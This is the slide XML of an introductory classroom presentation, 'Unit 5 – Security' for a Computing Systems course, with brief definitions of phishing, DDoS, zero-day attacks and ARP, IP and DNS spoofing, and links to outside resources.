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embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lustria" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId37"/>
    </p:embeddedFon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9" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="63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ca-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2f9b431b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a:t>Hola pepsicola!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;gb2f9b431b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165b4ba0d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165b4ba0d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c165b4ba0d_0_1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165b4ba0d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165b4ba0d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c165b4ba0d_0_1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c3b71870e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c3b71870e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c3b71870e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165b4ba0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165b4ba0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c165b4ba0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1acc2c979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1acc2c979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c1acc2c979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3b71870eb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c3b71870eb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c3b71870eb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c3b71870eb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c3b71870eb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c3b71870eb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3ee5209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3ee52098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c3ee52098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3ee52098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c3ee520984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c3ee520984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3f3f63b3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3f3f63b3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c3f3f63b3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fcd153e1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bfcd153e1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c3eda215cf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c3eda215cf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c3eda215cf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c3eda215cf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c3eda215cf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c3eda215cf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3eda215cf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3eda215cf_0_2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c3eda215cf_0_2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c1acc2c979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c1acc2c979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c1acc2c979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c3eda215cf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c3eda215cf_0_2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c3eda215cf_0_2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3eda215cf_0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3eda215cf_0_2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c3eda215cf_0_2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c1acc2c97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c1acc2c979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c1acc2c979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c3eda215cf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c3eda215cf_0_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c3eda215cf_0_1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c3eda215cf_0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c3eda215cf_0_2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c3eda215cf_0_2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3eda215cf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3eda215cf_0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c3eda215cf_0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165b4ba0d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165b4ba0d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c165b4ba0d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3eda215cf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3eda215cf_0_2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c3eda215cf_0_2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c3eda215cf_0_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c3eda215cf_0_2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c3eda215cf_0_2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c3eda215cf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c3eda215cf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165b4ba0d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165b4ba0d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c165b4ba0d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165b4ba0d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c165b4ba0d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c165b4ba0d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165b4ba0d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165b4ba0d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c165b4ba0d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165b4ba0d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165b4ba0d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c165b4ba0d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c076abc96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c076abc96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c076abc96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ca-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165b4ba0d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165b4ba0d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c165b4ba0d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ca-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26"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Google Shape;27;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-8467"/>
            <a:ext cx="12192000" cy="6866467"/>
            <a:chOff x="0" y="-8467"/>
            <a:chExt cx="12192000" cy="6866467"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Google Shape;28;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9" name="Google Shape;29;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0" name="Google Shape;30;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1" name="Google Shape;31;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2" name="Google Shape;32;p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D359D7">
                <a:alpha val="69803"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Google Shape;34;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E8C786">
                <a:alpha val="69803"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Google Shape;35;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6" name="Google Shape;36;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Arial"/>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40" name="Google Shape;40;p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Arial"/>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7" name="Google Shape;97;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Arial"/>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Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1120"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="960"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="960"/>
              <a:buFont typeface="Arial"/>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3" name="Google Shape;103;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4" name="Google Shape;104;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
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;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ca-ES" sz="8000">
                <a:solidFill>
                  <a:srgbClr val="E8C786"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;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ca-ES" sz="8000">
                <a:solidFill>
                  <a:srgbClr val="E8C786"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="E8C786"/>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400"/>
              <a:buFont typeface="Arial"/>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2" name="Google Shape;112;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itar la tarjeta de nombre">
  <p:cSld name="Citar la tarjeta de nombre">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Arial"/>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Arial"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1120"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="960"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="960"/>
              <a:buFont typeface="Arial"/>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8" name="Google Shape;118;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9" name="Google Shape;119;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
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;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ca-ES" sz="8000">
                <a:solidFill>
                  <a:srgbClr val="E8C786"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;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ca-ES" sz="8000">
                <a:solidFill>
                  <a:srgbClr val="E8C786"/>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dadero o falso">
  <p:cSld name="Verdadero o falso">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Arial"/>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Arial"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1280"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1120"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="960"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="960"/>
              <a:buFont typeface="Arial"/>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7" name="Google Shape;127;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8" name="Google Shape;128;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3600"/>
              <a:buFont typeface="Arial"/>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6" name="Google Shape;46;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000"/>
              <a:buFont typeface="Aria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2" name="Google Shape;52;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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;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8" name="Google Shape;58;p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36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5" name="Google Shape;65;p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6" name="Google Shape;66;p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7" name="Google Shape;67;p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8" name="Google Shape;68;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71"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;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76"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Google Shape;77;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000"/>
              <a:buFont typeface="Arial"/>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3" name="Google Shape;83;p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4" name="Google Shape;84;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400"/>
              <a:buFont typeface="Aria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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;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ca-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 name="Google Shape;12;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3" name="Google Shape;13;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D359D7">
                <a:alpha val="69803"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Google Shape;17;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E8C786">
                <a:alpha val="69803"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Google Shape;18;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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Google Shape;23;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4" name="Google Shape;24;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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="0" marR="0" lvl="5" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="0" marR="0" lvl="6" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="0" marR="0" lvl="7" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="0" marR="0" lvl="8" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="90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oundcloud.com/user-605784783/telefonica-hac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pacehuhn/ArduinoARPspoo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channel/UCqbkm47qBxDj-P3lI9voIA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LSgk7ctw1H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hyperlink" Target="https://tecnonucleous.com/2018/05/09/biblioteca-de-python-con-una-backdoor-robo-claves-ssh/"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google.com/landing/2step/"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3aX9zK88X9M&amp;ab_channel=thenewbost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12192001" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;148;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2118621" y="-203506"/>
            <a:ext cx="9673500" cy="2387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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>uNit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES" b="1"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ca-ES" b="1"/>
              <a:t>Security    </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Lustria"/>
              <a:ea typeface="Lustria"/>
              <a:cs typeface="Lustria"/>
              <a:sym typeface="Lustria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507067" y="4050833"/>
            <a:ext cx="7767000" cy="10968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SzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" i="1" u="sng">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Computing Systems</a:t>
            </a:r>
            <a:endParaRPr i="1" u="sng">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p18"/>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10</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p27"/>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Phishing</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="68646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It is a scam to gain access. It consists of using malicious code to change web access. Users who log in to a fake website. They think that it is the web or the mail of their bank. </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248" name="Google Shape;248;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5069825" y="5525800"/>
            <a:ext cx="667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49" name="Google Shape;249;p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578125" y="2846725"/>
            <a:ext cx="4765026" cy="37067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11</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p28"/>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DDoS</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="68646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Distributed denial-of-service</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258" name="Google Shape;258;p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466922" y="2548362"/>
            <a:ext cx="5123752" cy="36305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12</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p29"/>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0-Day</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="68646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Attack to a new system.</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267" name="Google Shape;267;p29">
            <a:hlinkClick r:id="rId3"/>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854999" y="2995891"/>
            <a:ext cx="4142700" cy="1519000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="268" name="Google Shape;268;p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550524" y="2268525"/>
            <a:ext cx="1910999" cy="95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0"/>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13</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;p30"/>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Spoofing</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951800" y="1851750"/>
            <a:ext cx="68646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accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It consists of identity theft</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>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Can be</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D9A337"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP Spoofing</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D9A337"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP Spoofing</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="D9A337"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS Spoofing</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277" name="Google Shape;277;p30">
            <a:hlinkClick r:id="rId3"/>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136628" y="2419175"/>
            <a:ext cx="3665451" cy="2388650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5136625" y="4341000"/>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2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ca-ES" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Arduino ARP-Spoof</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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31000" y="2762300"/>
            <a:ext cx="5931500" cy="3363160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p31"/>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14</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236300" y="1884775"/>
            <a:ext cx="4572175" cy="4281550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
